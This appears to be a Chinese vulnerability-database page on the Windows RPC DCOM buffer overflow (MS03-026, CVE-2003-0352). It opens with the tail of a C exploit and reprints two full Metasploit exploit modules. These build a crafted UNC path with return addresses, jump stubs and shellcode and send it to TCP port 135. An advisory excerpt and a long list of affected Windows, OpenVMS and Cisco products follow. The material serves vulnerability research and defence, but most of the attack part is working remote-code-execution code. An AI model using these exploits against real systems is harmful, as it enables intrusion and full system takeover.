    len=recv(sock,buf1,1000,0);
	if(len<=0)
	{
		printf("[-] recv error:%d\n", GetLastError());
		return;
	}
	else
		printf("[+] recv %d bytes.\n", len);

    len = send(sock,buf2,len1,0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
	else
		printf("[+] send %d bytes.\n", len);
    len=recv(sock,buf1,1024,0);
	if(len<=0)
	{
		printf("[+] Target crash or exploit success? :)\n");
	}
	else
		printf("[-] recv %d bytes. Bad luck!\n", len);
}



// milw0rm.com [2003-09-16]
		

- 漏洞信息 (16749)

Microsoft RPC DCOM Interface Overflow (EDBID:16749)
windows remote
2011-01-11 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RPC DCOM Interface Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
				was originally found by the Last Stage of Delirium research group and has been
				widely exploited ever since. This module can exploit the English versions of
				Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
			},
			'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11545 $',
			'References'     =>
				[
					[ 'CVE', '2003-0352'  ],
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
					[ 'BID', '8205'       ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 880,
					'MinNops'  => 300,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500
				},
			'Targets'        =>
				[
					# Target 0: Universal
					[
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x77f33723, # Windows NT 4.0 SP6a (esp)
									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
									0x010016c6, # Windows 2000 Universal (ebx)
									0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
									0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
									0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
									0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 16 2003'))
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 135 for automated exploitation

		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			datastore['RPORT'] = 135
		end

		true
	end

	def exploit
		connect
		print_status("Trying target #{target.name}...")

		handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# Carefully create the combination of addresses and code for cross-os exploitation
		xpseh = rand_text_alphanumeric(360, payload_badchars)

		# Jump to [esp-4] - (distance to shellcode)
		jmpsc =
			"\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
			"\x05\xe0\xfa\xff\xff"  + 		# add eax,0xfffffae0 (sub eax, 1312)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
		jmpsc2k3 =
			"\x8b\x45\x30"         + 		# mov eax,[ebp+0x30]
			"\x05\x24\xfb\xff\xff" + 		# add eax,0xfffffb24 (sub 1244)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Windows 2003 added by spoonm
		xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
		xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
		xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')

		xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
		xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
		xpseh[ 314, jmpsc.length ] = jmpsc

		#
		# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
		# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
		# HD wrote NT 4.0 SP6a, and it's off in a different place
		#
		# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
		# (hopefully I'm accurate, this is from my memory...)
		#
		# |---pop pop ret--------        --eax---|
		# V                     |        |       V
		# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
		#     4             4           4              5               5
		#     |                                                 ^
		#     --------------------------------------------------|
		# The jmpback's all are 5 byte backwards jumps into our shellcode that
		# sits just below these overwrites...
		#

		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
			rand_text(2, payload_badchars)

		nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
		nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
		ntshiz =
			nt4sp3jmp +
			[ target['Rets'][6] ].pack('V') +
			[ target['Rets'][5] ].pack('V') +
			nt4sp5jmpback +
			nt4sp3jmpback

		# Pad to the magic value of 118 bytes
		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)

		# Create the evil UNC path used in the overflow
		uncpath =
			Rex::Text.to_unicode("\\\\") +
			make_nops(32) +

			# When attacking NT 4.0, jump over 2000/XP return
			Rex::Arch::X86.jmp_short(16) +
			Rex::Arch::X86.jmp_short(25) +

			[ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
			[ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
			[ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
			make_nops(88) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			make_nops(8) +
			Rex::Arch::X86.jmp_short(4) +
			Rex::Arch::X86.jmp_short(4) +
			make_nops(4) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			payload.encoded +
			ntshiz +
			xpseh +
			Rex::Text.to_unicode("\\\x00")

		# This is the rpc cruft needed to trigger the vuln API
		stubdata =
			NDR.short(5) +
			NDR.short(1) +
			NDR.long(0) +
			NDR.long(0) +

			rand_text(16) +

			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +

			NDR.long(rand(0xFFFFFFFF)) +

			NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +

			NDR.long(0) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF))

		print_status('Sending exploit ...')
		begin
			dcerpc_call(0, stubdata, nil, false)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
		

- 漏洞信息 (22917)

Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (EDBID:22917)
windows remote
2003-08-11 Verified
0 aT4r@3wdesign.es
N/A [点击下载]
source: http://www.securityfocus.com/bid/8205/info
   
A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system.
   
This issue may be exposed on other ports that the RPC Endpoint Mapper listens on, such as TCP ports 139, 135, 445 and 593. This has not been confirmed. Under some configurations the Endpoint Mapper may receive traffic via port 80.
   
** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners.

http://www.exploit-db.com/sploits/22917.zip		

- 漏洞信息 (F83012)

Microsoft RPC DCOM Interface Overflow (PacketStormID:F83012)
2009-11-26 00:00:00
H D Moore,spoonm,cazz  metasploit.com
exploit,overflow
windows,2k,nt,xp
CVE-2003-0352
[点击下载]

This Metasploit module exploits a stack overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has bee widely exploited ever since. This Metasploit module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RPC DCOM Interface Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the RPCSS service, this vulnerability
				was originally found by the Last Stage of Delirium research group and has bee
				widely exploited ever since. This module can exploit the English versions of
				Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
			},
			'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0352'  ],
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
					[ 'BID', '8205'       ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 880,
					'MinNops'  => 300,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					# Target 0: Universal
					[ 
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						{
							'Platform' => 'win',
							'Rets'     => 
								[
									0x77f33723, # Windows NT 4.0 SP6a (esp)
									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
									0x0018759f, # Windows 2000 Universal (ebx)
									0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
									0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
									0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
									0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
								],
						},
					],
				],
			'DefaultTarget' => 0))
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 135 for automated exploitation
		
		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			datastore['RPORT'] = 135
		end
		
		true
	end
		
	def exploit
		connect
		print_status("Trying target #{target.name}...")
	
		handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")
				
		# Carefully create the combination of addresses and code for cross-os exploitation
		xpseh = rand_text_alphanumeric(360, payload_badchars)
		
		# Jump to [esp-4] - (distance to shellcode)
		jmpsc =
			"\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
			"\x05\xe0\xfa\xff\xff"  + 		# add eax,0xfffffae0 (sub eax, 1312)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
		jmpsc2k3 =
			"\x8b\x45\x30"         + 		# mov eax,[ebp+0x30]
			"\x05\x24\xfb\xff\xff" + 		# add eax,0xfffffb24 (sub 1244)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Windows 2003 added by spoonm
		xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
		xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
		xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')

		xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
		xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
		xpseh[ 314, jmpsc.length ] = jmpsc
		
		#
		# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
		# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
		# HD wrote NT 4.0 SP6a, and it's off in a different place
		#
		# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
		# (hopefully I'm accurate, this is from my memory...)
		#
		# |---pop pop ret--------        --eax---|
		# V                     |        |       V
		# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
		#     4             4           4              5               5
		#     |                                                 ^
		#     --------------------------------------------------|
		# The jmpback's all are 5 byte backwards jumps into our shellcode that
		# sits just below these overwrites...
		#

		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + 
	            	rand_text(2, payload_badchars)		

		nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
		nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
		ntshiz = 
			nt4sp3jmp + 
			[ target['Rets'][6] ].pack('V') + 
			[ target['Rets'][5] ].pack('V') +
			nt4sp5jmpback + 
			nt4sp3jmpback

		# Pad to the magic value of 118 bytes
		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)		
		
		# Create the evil UNC path used in the overflow
		uncpath = 
			Rex::Text.to_unicode("\\\\") + 
			make_nops(32) +
			
			# When attacking NT 4.0, jump over 2000/XP return
			Rex::Arch::X86.jmp_short(16) +
			Rex::Arch::X86.jmp_short(25) +
			
			[ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
			[ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
			[ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
			make_nops(88) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			make_nops(8) +
			Rex::Arch::X86.jmp_short(4) +
			Rex::Arch::X86.jmp_short(4) +
			make_nops(4) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			payload.encoded + 
			ntshiz + 
			xpseh +
			Rex::Text.to_unicode("\\\x00")

		# This is the rpc cruft needed to trigger the vuln API
		stubdata =
			NDR.short(5) +
			NDR.short(1) +
			NDR.long(0) +
			NDR.long(0) +

			rand_text(16) + 

			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +

			NDR.long(rand(0xFFFFFFFF)) +

			NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +

			NDR.long(0) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF))
		
		print_status('Sending exploit ...')
		begin
			dcerpc_call(0, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect	
	end

end
    

- 漏洞信息

2100
Microsoft Windows RPC DCOM Interface Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

Microsoft Windows platforms contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the Remote Procedure Call (RPC) Distributed Component Object Model (DCOM) interface that does not properly sanitize remote requests. If an attacker sends a specially crafted message to the server, they may be able to crash the service or execute arbitrary code with SYSTEM privileges.

- 时间线

2003-07-16 Unknow
2003-07-16 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
Boundary Condition Error 8205
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to The Last Stage of Delirium Research Group.

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Compaq OpenVMS 7.3 -1 Alpha
Compaq OpenVMS 7.3 VAX
Compaq OpenVMS 7.3 Alpha
Compaq OpenVMS 7.2.1 Alpha
Compaq OpenVMS 7.2 -2 Alpha
Compaq OpenVMS 7.2 -1H2 Alpha
Compaq OpenVMS 7.2 -1H1 Alpha
Compaq OpenVMS 7.2 VAX
Compaq OpenVMS 7.2 Alpha
Compaq OpenVMS 7.1 -2 Alpha
Compaq OpenVMS 7.1 VAX
Compaq OpenVMS 7.1 Alpha
Compaq OpenVMS 6.2 -1H3 Alpha
Compaq OpenVMS 6.2 -1H2 Alpha
Compaq OpenVMS 6.2 -1H1 Alpha
Compaq OpenVMS 6.2 VAX
Compaq OpenVMS 6.2 Alpha
Cisco Wireless Lan Solution Engine
Cisco VPN/Security Management Solution
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco uOne 4.0
Cisco uOne 3.0
Cisco uOne 2.0
Cisco uOne 1.0
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
Cisco Secure ACS for Windows Server 3.2
Cisco Secure ACS for Windows NT 3.1.1
Cisco Secure ACS for Windows NT 3.0.3
Cisco Secure ACS for Windows NT 3.0 .1
Cisco Secure ACS for Windows NT 3.0
Cisco Secure ACS for Windows NT 2.6.4
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6
Cisco Secure ACS for Windows NT 2.5
Cisco Secure ACS for Windows NT 2.4
Cisco Secure ACS for Windows NT 2.3
Cisco Secure ACS for Windows NT 2.1
Cisco Secure Access Control Server 3.2.1
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Telephony Environment Monitor
Cisco IP Contact Center Express
Cisco Internet Service Node
Cisco Intelligent Contact Manager
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
